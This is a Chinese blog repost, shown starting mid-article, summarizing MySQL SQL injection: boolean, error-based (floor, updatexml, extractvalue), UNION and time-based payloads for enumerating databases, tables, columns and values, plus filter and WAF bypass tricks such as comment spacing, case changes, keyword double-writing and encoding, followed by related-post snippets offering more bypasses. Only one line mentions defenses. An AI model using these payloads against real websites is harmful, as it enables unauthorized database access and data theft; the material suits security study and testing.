mysql绕过技巧总结_MYSQL注入基础及绕过技巧总结

最新推荐文章于 2024-04-30 04:08:20 发布
最新推荐文章于 2024-04-30 04:08:20 发布
阅读量384 收藏 1
点赞数
文章标签: mysql绕过技巧总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39581995/article/details/113980278
版权

2、MYSQL注入实战心得:一试参数,二试类型,三试绕过

一试参数:任何注入参数,都需确定其类型(数字还是字符),此处指的是注入参数的类型(***)

常用测试字符:引号(单双),圆括号,引号加圆括号......

二试类型:五大类(BEUST):布尔型盲注、报错型注入、UNION联合查询型注入、时间延迟型盲注、堆查询注入

布尔型盲注:and 1=1 , and 1=2 , or 1=1 , or 1=2 ......

报错型注入:

floor:and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

updatexml:and 1=updatexml(1,concat(0x7e,(select database())),1)

extractvalue:and 1=extractvalue(1,concat(0x7e,(select database())))

......

UNION联合查询型注入:

order by n //定字段,n为正整数

union select 1,2,3...... //看回显,无回显的时候尝试让union前的语句报错(@@@&&****)

回显位爆库,表,字段,值,以第二位为回显位举例,常用命令如下所示:

union select 1,group_concat(schema_name),3 from information_schema.schemata //爆库

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()//爆表

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘表名‘//爆字段

union select 1,group_concat(字段1,0x3a,字段2),3 from 表名 //爆值,0x3a是用来分隔字段的,方便我们查看

时间延迟型注入:根据页面响应延迟来判断,测试参数:and sleep(5)

注入方法(猜解法):

and if(length(database())>‘5‘,sleep(5),0)  //猜解库名长度

and if(ord(mid(database(),1,1))>100,sleep(5),0)  //猜库名第一个字符

......此处借助sqlmap会更好一些

堆查询注入:同时执行多条sql语句,可以执行增删改查语句,不同语句以分号隔开

三试绕过:就是不断地尝试,简单说几个

绕过空格:+,/**/,双重空格,回车换行符(%0a,%a0),宽字节(%df),圆括号

绕过union,select等关键字:大小写,双写(uniounionn,unionunion),内联注释(/*!union*/),编码

绕过and、or:&&,||,%26%26,大小写,双写关键字(anandd,andand),编码

......

3、MYSQL注入防御方法:黑白名单严格过滤用户输入的内容;使用参数化查询;使用sql注入安全防护设备

MYSQL注入基础及绕过技巧总结

标签:sqlmap   实战   nan   换行符   技巧   mys   用户输入   长度   参数

本条技术文章来源于互联网,如果无意侵犯您的权益请点击此处反馈版权投诉

本文系统来源:http://www.cnblogs.com/peterpan0707007/p/7536126.html

weixin_39581995
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql绕waf_SQL注入9种绕过WAF方法
weixin_30586417的博客
01-31 597
SQL注入9种绕过WAF方法0x01前言WAF区别于常规防火墙是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止来自、(XSS)、和安全配置错误。0x02 WAF工作原理§检测异常协议:拒绝不符合HTTP标准的请求§增强型的输入验证:代理和服务器端验证,而不仅仅是客户端验证§白名单和黑名单§基于规则和异常...
MySQL注入绕开过滤的技巧总结
12-16
使用注释/**/绕过空格; select * from/**/users/**/where id=1; 情况二:限制from与某种字符组合 在from后加个点.即使用from.来代替from; select * from. users where id=1; 再直接看GIF: 说白了,就是将...
mysql注入基础_MYSQL注入基础绕过技巧总结
weixin_39940755的博客
02-06 137
1、MYSQL注入原理:用户输入的内容被当作sql语句来执行2、MYSQL注入实战心得:一试参数,二试类型,三试绕过一试参数:任何注入参数,都需确定其类型(数字还是字符),此处指的是注入参数的类型(***)常用测试字符:引号(单双),圆括号,引号加圆括号......二试类型:五大类(BEUST):布尔型盲注、报错型注入、UNION联合查询型注入、时间延迟型盲注、堆查询注入布尔型盲注:and 1=1...
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
2401_84253037的博客
04-30 627
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。在使用盲注的时候,需要使用到substr(),mid(),limit。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
mysql注入的 反斜杠_SQL注入防御绕过——二次编码之干掉反斜杠
weixin_42588555的博客
01-26 1324
01 背景知识一、为什么要进行URL编码通常如果一样东西需要编码,说明这样东西并不适合传输。对于URL来说,编码主要是为了避免引发歧义与混乱。例如,URL参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/?name=abc&pwd=123如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引起歧义...
记一次MySQL注入绕过
末初的CSDN博客
10-01 2128
来源于今天一位朋友叫我帮忙看的题目 查看源码发现提示 存在过滤且,limit参数只能为单个数字 fuzz一下sql注入关键字看看都过滤了哪些字符 直接在class参数插入exp(100)回显正常,插入exp(1000)发现返回database error;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示; 那么就可以做布尔盲注了,但是比较棘手的是过滤了逗号,;不能使用if进行条件判断;绕过逗号的方法from x for y不能在if中使用。 if无法使用可以用c.
mysql绕过_Mysql注入绕过姿势
weixin_31618799的博客
01-18 304
1.内联绕过2.编码绕过,如URLEncode编码,ASCII,HEX,unicode编码绕过or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。十六进制编码SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))双重编码绕过?id=1%252f%2...
Mysql如何巧妙的绕过未知字段名详解
09-09
本篇将详细介绍如何巧妙地绕过未知字段名的限制,通过提供的示例代码进行学习。 首先,我们要知道MySQL提供了多种方式来规避对特定字符(如空格和逗号)的过滤。例如,当空格被过滤时,我们可以使用 `%0a`、`%0b`、...
mysql注入绕过技术
06-04
mysql注入绕过技术
MySQL_Exploit.rar_0day_C 0day_Exploit_mysql c
09-22
这里提到的"C 0day exploit"很可能指的是一种用C语言编写的、利用0day漏洞的攻击代码,它可以被用来绕过MySQL的安全防御,执行非授权操作,如数据窃取、系统控制或数据破坏。 标签中的"mysql__c"进一步强调了这个...
mysql注入绕过的一些技巧
weixin_30258027的博客
08-14 248
虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因 1.注释绕过 select/*comment*/user/*zzsdsdsf*/from mysql.user; 2.内联注释绕过 /*!12345select*//*!12345user*/ from mysql.user; 3.特殊空白字符绕过 在php中\s会匹配0x09...
Mysql数据库手工注入-编码绕过
qq_62793621的博客
11-11 170
拒绝脚本小子,sql手工注入
mysql注入转义绕过_SQL注入防御绕过——二次注入
weixin_33124479的博客
01-28 647
01 二次注入原理二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。二次注入,可以概括为以下两步:第一步:插入恶意数据进行数据库插入数...
MySQL注入 绕过去除注释符
m_de_g的博客
12-08 2462
MySQL注入 绕过去除注释符 1.MySQL中的注释符 注释符的作用:用于标记某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行。 MySQL中的注释符: 1.单行注释:--+或--空格或# 2.对行注释:/*多行注释内容*/ 对于正常的SQL语句中,注释符起到说明作用的功能。但是对于在利用SQL注入漏洞过程中,注释符起到闭合单引号、多引号、双引号、单括号、多括号的功能。 2.去除注释符的代码分析 preg_replace(mixed $pattern,mixed $replacemen
iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过
mooyuan的博客
11-29 1320
打开靶场第09关,http://192.168.71.151/sqli/09.php?id=1如下所示​SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第9关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第09关卡过滤了不区分大小写select关键字。
sql注入绕过方法总结
nigo134的博客
06-17 2747
转至:sql注入绕过方法总结_huanghelouzi的博客-CSDN博客_sql绕过 我们希望用户输入的 id 的值,仅仅是一个字符串,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 是作为了 sql语句 来执行的。常用的注释符有 实例 大小写绕过 常用于 的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。 例如:waf过滤了关键字,可以尝试使用等绕过。 内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 中,这样这些
绕过剔除and和or的SQL注入
一米八多的瑞兹的博客
03-07 900
绕过剔除and和or的SQL注入 1. 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码。 3、符号和关键字替换 and – &&、or – ||。 4、内联注释与多行注释 /! 内联注释/ /多行注释/。 2. 去除and和or的代码分析 preg_replace(mixed $pattern , mixed $replacement , mixed $subject):执行一个正则表达式的搜索和替换。 $pattern: 要
ctf sql注入关键词绕过【积累中】
热门推荐
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
CC's Blog
04-23 2071
1.and 用&& 代替 2. or 用||代替 3.union select from 变成 /*!union*/这种。 一个例子: / select 1 /*!union*/ select 2 from adad where 1&&1 摘自 it_security 绕过waf的一个思路
mysql 绕过身份雁阵
最新发布
06-20
MySQL绕过身份验证通常指的是尝试未经授权访问MySQL数据库,这通常是非法的并且违反了数据库安全原则。如果遇到这种情况,通常有以下几种可能: 1. **弱密码或默认账户**:检查是否有使用默认或常见密码的用户,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值